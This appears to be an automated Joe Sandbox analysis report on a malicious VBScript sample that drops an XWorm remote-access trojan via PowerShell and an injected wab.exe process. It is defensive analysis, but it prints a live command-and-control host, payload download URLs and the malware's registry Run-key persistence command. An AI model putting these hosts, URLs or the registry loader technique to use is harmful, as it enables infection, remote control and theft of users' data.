              Source: wab.exe, 00000013.00000002.2566248537.0000000023CC5000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000013.00000002.2566248537.0000000023A79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
              Source: wab.exe, 00000013.00000002.2566248537.0000000023CC5000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000013.00000002.2566248537.0000000023A79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managert-
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: wab.exe, 00000013.00000002.2542507637.00000000079D7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000013.00000002.2566754724.0000000025A7D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: 00000013.00000002.2566248537.0000000023A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 1912, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: 00000013.00000002.2566248537.0000000023A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 1912, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information221
              Scripting              		Valid Accounts11
              Windows Management Instrumentation              		221
              Scripting              		1
              DLL Side-Loading              		1
              Disable or Modify Tools              		OS Credential Dumping1
              File and Directory Discovery              		Remote Services1
              Archive Collected Data              		1
              Ingress Tool Transfer              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Exploitation for Client Execution              		1
              DLL Side-Loading              		112
              Process Injection              		2
              Obfuscated Files or Information              		LSASS Memory14
              System Information Discovery              		Remote Desktop ProtocolData from Removable Media11
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts11
              Command and Scripting Interpreter              		1
              Registry Run Keys / Startup Folder              		1
              Registry Run Keys / Startup Folder              		1
              Software Packing              		Security Account Manager131
              Security Software Discovery              		SMB/Windows Admin SharesData from Network Shared Drive1
              Non-Standard Port              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell              		Login HookLogin Hook1
              DLL Side-Loading              		NTDS2
              Process Discovery              		Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Masquerading              		LSA Secrets141
              Virtualization/Sandbox Evasion              		SSHKeylogging213
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Modify Registry              		Cached Domain Credentials1
              Application Window Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
              Virtualization/Sandbox Evasion              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job112
              Process Injection              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1445938 Sample: temp.vbs Startdate: 22/05/2024 Architecture: WINDOWS Score: 100 37 xw9402may.duckdns.org 2->37 39 ranchoboscardin.com.br 2->39 51 Snort IDS alert for network traffic 2->51 53 Found malware configuration 2->53 55 Malicious sample detected (through community Yara rule) 2->55 59 8 other signatures 2->59 11 wscript.exe 1 2->11         started        signatures3 57 Uses dynamic DNS services 37->57 process4 signatures5 63 VBScript performs obfuscated calls to suspicious functions 11->63 65 Suspicious powershell command line found 11->65 67 Wscript starts Powershell (via cmd or directly) 11->67 69 3 other signatures 11->69 14 powershell.exe 14 19 11->14         started        process6 dnsIp7 43 ranchoboscardin.com.br 67.23.238.5, 443, 49700, 49707 DIMENOCUS United States 14->43 71 Suspicious powershell command line found 14->71 73 Very long command line found 14->73 75 Found suspicious powershell code related to unpacking or dynamic code loading 14->75 18 powershell.exe 17 14->18         started        21 conhost.exe 14->21         started        23 cmd.exe 1 14->23         started        signatures8 process9 signatures10 45 Writes to foreign memory regions 18->45 47 Found suspicious powershell code related to unpacking or dynamic code loading 18->47 49 Hides threads from debuggers 18->49 25 wab.exe 2 10 18->25         started        29 cmd.exe 1 18->29         started        process11 dnsIp12 41 xw9402may.duckdns.org 12.221.146.138, 49708, 9402 ATT-INTERNET4US United States 25->41 61 Hides threads from debuggers 25->61 31 cmd.exe 1 25->31         started        signatures13 process14 process15 33 conhost.exe 31->33         started        35 reg.exe 1 1 31->35         started       

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              No Antivirus matches

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
              https://aka.ms/pscore6lB0%URL Reputationsafe
              http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              https://ranchoboscardin.com.br/cs/Rrknoglerne.asdXR0%Avira URL Cloudsafe
              https://ranchoboscardin.com.br/cs/yGxZBUGU144.bin0%Avira URL Cloudsafe
              https://ranchoboscardin.com.br/cs/yGxZBU0%Avira URL Cloudsafe
              https://ranchoboscardin.com.br0%Avira URL Cloudsafe
              https://ranchoboscardin.com.br/cs/Rrknoglerne.asdP0%Avira URL Cloudsafe
              https://ranchoboscardin.com.br/cs/Rrknoglerne.asd0%Avira URL Cloudsafe
              xw9402may.duckdns.org0%Avira URL Cloudsafe
              https://ranchoboscardin.com.br/0%Avira URL Cloudsafe
              http://www.microsoft.C0%Avira URL Cloudsafe
              http://ranchoboscardin.com.br0%Avira URL Cloudsafe
              https://ranchoboscardin.com.br/cs/yGxZBUGU144.bin?0%Avira URL Cloudsafe
              https://github.com/Pester/Pester0%Avira URL Cloudsafe
              https://ranchoboscardin.com.br/cs/yGxZBUGU144.binC0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              xw9402may.duckdns.org
              		12.221.146.138
              		truetrue
                		unknown
                ranchoboscardin.com.br
                		67.23.238.5
                		truefalse
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://ranchoboscardin.com.br/cs/Rrknoglerne.asdfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://ranchoboscardin.com.br/cs/yGxZBUGU144.binfalse
                  • Avira URL Cloud: safe
                  		unknown
                  xw9402may.duckdns.orgtrue
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://nuget.org/NuGet.exepowershell.exe, 0000000A.00000002.1884830141.0000024B64330000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1669259847.00000000055A8000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://ranchoboscardin.com.br/wab.exe, 00000013.00000002.2542507637.0000000007A19000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://ranchoboscardin.com.br/cs/Rrknoglerne.asdXRpowershell.exe, 0000000E.00000002.1664808097.0000000004698000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000E.00000002.1664808097.0000000004698000.00000004.00000800.00020000.00000000.sdmptrue
                  • URL Reputation: malware
                  		unknown
                  https://aka.ms/pscore6lBpowershell.exe, 0000000E.00000002.1664808097.0000000004541000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://ranchoboscardin.com.br/cs/yGxZBUwab.exe, 00000013.00000002.2565537277.0000000023470000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000E.00000002.1664808097.0000000004698000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1672574353.000000000707B000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://go.micropowershell.exe, 0000000A.00000002.1785583347.0000024B5550B000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://ranchoboscardin.com.br/cs/Rrknoglerne.asdPpowershell.exe, 0000000A.00000002.1785583347.0000024B544E8000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://contoso.com/powershell.exe, 0000000E.00000002.1669259847.00000000055A8000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://nuget.org/nuget.exepowershell.exe, 0000000A.00000002.1884830141.0000024B64330000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1669259847.00000000055A8000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://ranchoboscardin.com.brpowershell.exe, 0000000A.00000002.1785583347.0000024B544E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1785583347.0000024B55B7C000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://contoso.com/Licensepowershell.exe, 0000000E.00000002.1669259847.00000000055A8000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/Iconpowershell.exe, 0000000E.00000002.1669259847.00000000055A8000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://aka.ms/pscore68powershell.exe, 0000000A.00000002.1785583347.0000024B542C1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://ranchoboscardin.com.brpowershell.exe, 0000000A.00000002.1785583347.0000024B56067000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.microsoft.Cpowershell.exe, 0000000E.00000002.1672574353.00000000070E2000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000A.00000002.1785583347.0000024B542C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1664808097.0000000004541000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000013.00000002.2566248537.0000000023A41000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://ranchoboscardin.com.br/cs/yGxZBUGU144.bin?wab.exe, 00000013.00000002.2542507637.0000000007A19000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/Pester/Pesterpowershell.exe, 0000000E.00000002.1664808097.0000000004698000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1672574353.000000000707B000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://ranchoboscardin.com.br/cs/yGxZBUGU144.binCwab.exe, 00000013.00000002.2542507637.0000000007A19000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  12.221.146.138
                  		xw9402may.duckdns.orgUnited States
                  		7018ATT-INTERNET4UStrue
                  67.23.238.5
                  		ranchoboscardin.com.brUnited States
                  		33182DIMENOCUSfalse

                  General Information

                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1445938
                  Start date and time:2024-05-22 20:05:58 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 7m 59s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:27
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:temp.vbs
                  Detection:MAL
                  Classification:mal100.troj.expl.evad.winVBS@17/8@2/2
                  EGA Information:
                  • Successful, ratio: 33.3%
                  HCA Information:
                  • Successful, ratio: 83%
                  • Number of executed functions: 61
                  • Number of non-executed functions: 16
                  Cookbook Comments:
                  • Found application associated with file extension: .vbs

                  Warnings

                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target powershell.exe, PID 4040 because it is empty
                  • Execution Graph export aborted for target powershell.exe, PID 4788 because it is empty
                  • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtCreateKey calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • VT rate limit hit for: temp.vbs

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  14:06:58API Interceptor120x Sleep call for process: powershell.exe modified
                  15:49:39API Interceptor1007321x Sleep call for process: wab.exe modified
                  21:49:43AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Startup key %Forringens% -w 1 $kettledrummer=(Get-ItemProperty -Path 'HKCU:\Unsliding\').Warmnesses;%Forringens% ($kettledrummer)
                  21:49:51AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Startup key %Forringens% -w 1 $kettledrummer=(Get-ItemProperty -Path 'HKCU:\Unsliding\').Warmnesses;%Forringens% ($kettledrummer)

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  12.221.146.1381716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.dat-decoded.exeGet hashmaliciousGuLoader, XWormBrowse
                    Payment928263456.vbsGet hashmaliciousGuLoader, XWormBrowse
                      S094947576.vbsGet hashmaliciousXWormBrowse
                        D833045366489.vbsGet hashmaliciousXWormBrowse
                          171523950843d0d4ce6c771e6c6c7e64ceb935c0ded947946ed906a36bcb7bb77c7c48d03e458.dat-decoded.exeGet hashmaliciousRemcos, PrivateLoader, PureLog Stealer, XWormBrowse
                            171523950843d0d4ce6c771e6c6c7e64ceb935c0ded947946ed906a36bcb7bb77c7c48d03e458.dat-decoded.exeGet hashmaliciousRemcos, PrivateLoader, PureLog Stealer, XWormBrowse
                              623547849.vbsGet hashmaliciousRemcos, PrivateLoaderBrowse
                                623547849.vbsGet hashmaliciousRemcosBrowse
                                  F93834746.vbsGet hashmaliciousXWormBrowse
                                    171480967918559ee0f09356f718ff0dfe668220d8cc78479cff337022e437f871dc7d1b0b148.dat-decoded.exeGet hashmaliciousXWormBrowse
                                      67.23.238.5Goldurns.vbsGet hashmaliciousGuLoaderBrowse
                                        https://66259.enviolog.com.br/xiuweiwjayem/dyeitiouyd/t2TrNi/jamie.cao@hfw.comGet hashmaliciousHTMLPhisherBrowse

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          ranchoboscardin.com.brGoldurns.vbsGet hashmaliciousGuLoaderBrowse
                                          • 67.23.238.5

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          ATT-INTERNET4UShttps://www.google.com.bh/url?hl=en&q=https://www.google.com.bh/url?hl%3Den%26q%3Dhttp://www.google.com/amp/www.google.com/amp/www.google.com/amp/%252574%252569%25256E%252579%252575%252572%25256C%25252E%252563%25256F%25256D%25252F%25256D%252576%252574%252575%252575%252566%252537%252533%26source%3Dgmail%26ust%3D1716286979743000%26usg%3DAOvVaw0kIG15Hao_4RLWdhQSbrTj&source=gmail&ust=1716287016979000&usg=AOvVaw2OvZXU7t2_QCy0TjxskKGnGet hashmaliciousUnknownBrowse
                                          • 209.38.160.113
                                          S4kCacU4pQ.elfGet hashmaliciousGafgyt, MiraiBrowse
                                          • 68.249.120.172
                                          http://sallywilliamson.comGet hashmaliciousUnknownBrowse
                                          • 13.32.27.113
                                          bR9Ri9cFkm.elfGet hashmaliciousUnknownBrowse
                                          • 70.224.168.154
                                          hCNsvwoPS6.elfGet hashmaliciousUnknownBrowse
                                          • 67.116.193.33
                                          qwmLv2FcgD.elfGet hashmaliciousUnknownBrowse
                                          • 45.17.56.16
                                          dn7MMSZM9O.elfGet hashmaliciousUnknownBrowse
                                          • 70.154.176.135
                                          http://sallywilliamson.com/Get hashmaliciousUnknownBrowse
                                          • 13.32.27.35
                                          https://phantmuiswalles.gitbook.io/Get hashmaliciousUnknownBrowse
                                          • 13.32.27.54
                                          SecuriteInfo.com.Win32.TrojanX-gen.3459.12800.exeGet hashmaliciousUnknownBrowse
                                          • 13.32.23.209
                                          DIMENOCUSPI_20052024.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                          • 67.23.226.139
                                          Shipping Document.vbsGet hashmaliciousGuLoaderBrowse
                                          • 198.49.68.125
                                          Goldurns.vbsGet hashmaliciousGuLoaderBrowse
                                          • 67.23.238.5
                                          facturas y albaranes del mes de marzo y abril-pdf.exeGet hashmaliciousFormBookBrowse
                                          • 66.7.218.190
                                          SecuriteInfo.com.Win64.PWSX-gen.13670.618.exeGet hashmaliciousFormBookBrowse
                                          • 66.7.218.190
                                          TT_Copy.cmdGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                                          • 184.171.244.30
                                          2R78NbtrsM.msiGet hashmaliciousUnknownBrowse
                                          • 187.45.187.42
                                          https://online.kellycancian.com.br/Get hashmaliciousUnknownBrowse
                                          • 67.23.238.83
                                          gVPlpwuoVV.elfGet hashmaliciousMiraiBrowse
                                          • 212.18.238.159
                                          https://www.nirsoft.net/utils/pinginfoview.zipGet hashmaliciousUnknownBrowse
                                          • 138.128.181.29

                                          JA3 Fingerprints

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          3b5074b1b5d032e5620f69f9f700ff0eAirbornemx SWIFT COPY _ Wednesday May 2024..rtfGet hashmaliciousHTMLPhisherBrowse
                                          • 67.23.238.5
                                          Draft BL copy.exeGet hashmaliciousAgentTeslaBrowse
                                          • 67.23.238.5
                                          5302c416b0abd845fe3145f910e82440588c11219940fe89fd68722260a9b508_payload.exeGet hashmaliciousAgentTeslaBrowse
                                          • 67.23.238.5
                                          what dmv forms do i need to sell my car in ny 88970.jsGet hashmaliciousGookitLoaderBrowse
                                          • 67.23.238.5
                                          RFQ-101432620247fl#U00e2#U00aexslx.exeGet hashmaliciousAgentTeslaBrowse
                                          • 67.23.238.5
                                          SOA_41457.exeGet hashmaliciousAgentTeslaBrowse
                                          • 67.23.238.5
                                          QUOTATION SHEET_RFQ 564077 2024.5.17.exeGet hashmaliciousAgentTeslaBrowse
                                          • 67.23.238.5
                                          INSTALLATION BOQ KATSINA.exeGet hashmaliciousAgentTeslaBrowse
                                          • 67.23.238.5
